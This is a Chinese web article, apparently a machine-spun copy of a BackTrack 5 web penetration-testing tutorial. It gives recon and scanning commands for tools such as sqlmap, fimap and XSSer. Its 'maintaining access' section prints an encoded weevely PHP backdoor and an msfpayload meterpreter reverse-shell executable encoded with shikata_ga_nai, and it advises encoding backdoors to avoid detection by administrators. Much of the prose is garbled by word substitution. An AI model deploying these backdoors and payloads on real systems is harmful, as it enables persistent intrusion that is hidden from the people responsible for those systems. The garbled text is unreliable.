|
|
|
联系客服020-83701501

用Backtrack进行渗透测试评估

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
用Backtrack遏制浸透测试评估

Web使用法式的解析在浸透测试和裂缝评料中发挥了烦忙的感染.必定Web使用法式的粗略音讯(比喻应用的插件,CMS范例等)都大要急救测试者应用准确的裂缝来测试,或是低落悉数浸透测试裂缝评估所破费的光阴.

Backtrack 5囊括很多浸透测试音讯收集所须要的工具.主要有如下几个方面:

CMS Identification(CMS指纹断定)

IDS/IPS Detection(IDS/IPS的检测)

Open Source Analysis(开源解析)

Web Crawlers(网络爬虫)

Vulnerability Assessment and Exploitation(脆弱性评估和拓荒)

Maintaining Access(敬服会面)

1)CMS Identification(CMS指纹断定):

blindelephant
cms-explorer
what站点

BlindElephant

BlindElephant是一款基于python的Web使用法式指纹识别工具.这款工具经过扫描某些已知地位的动静文件所应用的版本音讯和hashes文件遏制比对.Hashes文件中已经提前合计了干系Web使用法式的版本音讯.

这款工具的优势是快速,非侵入性,低带宽和高度踊跃化

应用设施:

BlindElephant.py [options] url appName

不知道Web使用法式或是插件的范例,咱们大要用意料的设施.比喻;

BlindElephant.py http://www.nxadmin.com wordpress

CMS-Explorer

CMS- Explorer是另一款Web使用法式指纹识别工具,是用perl脚本编写的.它大要必定应用的CMS范例,此后根据已知的裂缝质料遏制攻击.这款工 存在几个优势,大要从OSVDB(Open Source Vulnerability Database)中挪用裂缝音讯检查任何特定插件或是CMS是否存在裂缝.

应用设施:

# python cms-explorer.pl -url target -type type [options]
WhatWeb

WhatWeb大要用来必定处事器应用的CMS、博客平台、统计解析软件包、JavaScript库等.这个工存在超过900个插件用来扫描目标.

应用设施:

# ./what站点 nxadmin.com

列出扫数的插件用如下呼吁:
# ./what站点 -l

2)IDS/IPS detection(IDS/IPS探测):

在域环境下遏制侵害评估和浸透测试的时辰,有梗概会遇到有安置IDS/IPS的情况.IDS/IPS有些时辰能布局针对域环境的攻击.WAF(Web入侵防止系统)能很好的缓解入侵攻击.

但是WAF是很复杂或是检测到的,因为很多应用了基于签名的检测设施,因而攻击者大要经过对攻击参数遏制编码来绕过WAF.Backtrack有两款检测IDS/IPS的工具:

waffit
ua-tester

Waffit


Waffit是一款Web使用防火墙检测工具,检测防火墙保护的站点是在浸透测试中十分烦忙的一步.要是没有对WAF遏制配置,无意候梗概存在裂缝.在浸透测试大侵害评料中解析WAF也是十分烦忙的.经过编码攻击参数,大要绕过WAF.

应用设施:

wafw00f.py http://www.target.com/

3)Open-Source Analyses(开源代码解析):

Open-Source Analyses(寥落凋落源码解析)大要应用GHDB,revhosts,xssed,maltego.GHDB和XSSed须要进入彀站,另外的两款是工具.

GHDB


GHDB(Google Hacking Database)的exploit-db的团队收集了大量裂缝音讯库来不便浸透测试职员.咱们大要用处事器范例等音讯来探究干系的裂缝.

比喻: “Microsoft-IIS/6.0 intitle:index.of”大要用来搜索运行微软iis6.0的处事器.

XSSED

XSSED是另一个囊括大量存在跨站裂缝网站名单的网站,由差距的作者提交.浸透测试职员大要在XSSED的数据库中搜索他们的目标网站,有助于浸透测试大侵害评估.
Revhosts
Revhosts是一个被动的音讯收集技俩,是由python编写的,异样的大要急救浸透测试职员收集主机,捏造主机,DNS条款,目录,电子邮件所在,子网等音讯.

4)Web Crawlers(网站抓取):

Backtrack 5中有一款Web使用法式解析的网络爬虫工具站点shag,它是基于GUI和管束台的法式.大要用来扫描http和https的站点处事器,经过代办署该当用http认证.

站点shag有端口扫描,音讯收集,爬虫,阴森盘诘等.

下载所在:http://www.scrt.ch/en/attack/downloads/站点shag

5)Vulnerability Assessment and exploitation(侵害评估和独霸)

风 险评估是针对咱们扫描到的任何裂缝和BUG遏制评估,做侵害评估从前收集到无关的目标音讯是十分有急救的.音讯收集阶段是进一步攻击从前的环节一步,应用 工具会让这项工作比拟复杂.比喻在第一阶段,应用BlindElepha遏制CMS的扫描,发现已经安置的使用法式版本是Joomla.在侵害评估阶段就 大要应用像joomscan来扫描特定的裂缝.如下图:

应用设施:

./joomscan.pl –u www.nxadmin.com or IP address

joomscan大要扫描到安置的扫数插件和干系的裂缝音讯,独霸这些音讯咱们大要进一步遏制攻击.

sqlmap

sqlmap是一款很不错的遏制侵害评估的工具.这款工具大要测试目标URL是否存在脆弱性裂缝.上面这个例子中血色框中的参数”Newid”是存在脆弱性裂缝的.应用设施如下:

./sqlmap.py –u nxadmin.com -f

Fimap

Fimap是一款基于python的工具,大要用来发现,代码审计,裂缝独霸等.

应用设施:

fimap -u http://www.example.com/index.php?inc=index.php

-u 定义目标URL

扫描一个文本中的扫数URL列表,呼吁如下:

fimap -m -l ‘/tmp/urlscan.txt’

-m 批量扫描

-l 列表

应用谷歌批量搜索来扫描

fimap.py -g -q ‘inurl:include.php’

-g 从Google搜索

-q 透露表现后背跟的是谷歌搜索的盘诘条件

fimap大要独霸目标裂缝,同时也大要上传交互式的shell.

Xsser

Xsser是一款踊跃的XSS裂缝检测和独霸讲述的框架.它配备了绕过过滤器和另外注射行动的选项.

应用设施:

./XSSer.py -u “http://www.target.com” -g “Search.php?tfSearch=”–referer”666.666.666.666″ –user-agent”correctaudit”

这款工具供应了攻击的URL,阅读器和攻击设施等音讯,一旦存在裂缝URL被检测完成,咱们大要打开网站,检查确认.

theHarvestor

theHarvestor工具用于收集用户的姓名,他们的电子邮件账户,主机名等音讯,这款工存在助于浸透测试职员在浸透测试大侵害评估的初始阶段应用.

应用设施:

./theHaervester.py –ld [target domain] –d [ data source]

正在提取域和电子邮件干系的网站音讯,大要急救对无关目标的进一步攻击或研讨.

Shodan

这是另一款十分不错的评估工具,大要用来收集目标畛域内的音讯,比如链接在互联网上的配备,大要搜索任何网络配备,如路由器,网络德律风,打印机,摄像等.要搜索在域上运行的任哪里那边事,语法如下:

Hostname:target.com port:80,21,22

或是畅快无关主机名的后果,如:

Hostname:target.com

W3AF

W3af是站点代码审计和使用法式浸透测试工具。它分很多个模块,如攻击,审计,拓荒,暴力破解.所以这些都是大要针对性的应用,比喻咱们大要决意审计模块的sqli选项,要是咱们须要执行审计类的不凡任务.

下图浮现了一个目标网站的扼要流程图,使得咱们更复杂熟悉.

一旦扫描完成,W3AF框架浮现无关目标网站的裂缝音讯,大要为进一步拓荒针对性的裂缝独霸工具供应急救.


一旦发现裂缝,咱们大要配置插件中的”Exploit”标签,并遏制进一步的攻击,它大要急救咱们失掉一个目标网站的站点shell.另一个所长是w3af也是Metasploit下的一款工具,扫描的后果大要导出为HTML的技俩.

6)Maintaining Access(僵持会面):

咱们获得一个目标网站的权限之后,为了避免便将来会面,咱们须要保留一个后门,后门加密编码十分的烦忙,主要是为了防范防止被计划员轻易的检测撤废掉.

Backtrack 5中上传站点shell的范例工存在如下几款:

weevely

Weevely 是一款匿伏的PHP后门.它供应一个相同telnet的链接,链接之后大要执行系统的一些呼吁.应用消息探测系统绕过PHP的安全性限制.Weevely 探测system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()这些函数,应用在远程处事器上启用的函数听命.上面的代码是应用weevely构建一个后门的示例代码:

eval(base64_decode(‘cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=’));

应用设施:

构建一个后门

Weevely.py –g –o filename –p password

如许将构建一个存在特定称呼和暗码保护的后门,上传到目标处事器应用如下呼吁;

Weevely.py -t -u http://remote-ip/backdoor.php -p infosec

MsfPayload

Metasploit工具大要用来构建后门,或是僵持咱们对目标处事器的会面.须要应用到msfpayload这款工具.

咱们须要决意有用载荷,将经过反向链接天生一个shell,呼吁如下:

msf > msfpayload windows/meterpreter/reverse_tcp -R来给输出文件RAW数据技俩.

Msf > msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R

Msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> infosec.exe
-e大要用来指定须要的编码范例,这本例中应用的shikata_ga_nai编码,-t指定输出文件裁减名范例,本例中为.exe。

总 结,以上只不过是几种Web使用法式裂缝独霸发现的设施,一旦咱们获得无关的音讯,咱们大要针对Web使用法式遏制侵害评估,来失掉干系的裂缝音讯,独霸 这些裂缝有须要的话大要上传后门.正如文章提到的,最好是颠末加密编码的后门,防范防止被检测到.祈望本文有助于你浸透测试,以及后门权限的保持.

原文链接:

http://resources.infosecinstitute.com/站点-analysis-bt-5/

http://www.nxadmin.com/penetration/787.html

由网络安全攻防研讨室(www.91ri.org)音讯安全小组收集整理。

数安新闻+更多

证书相关+更多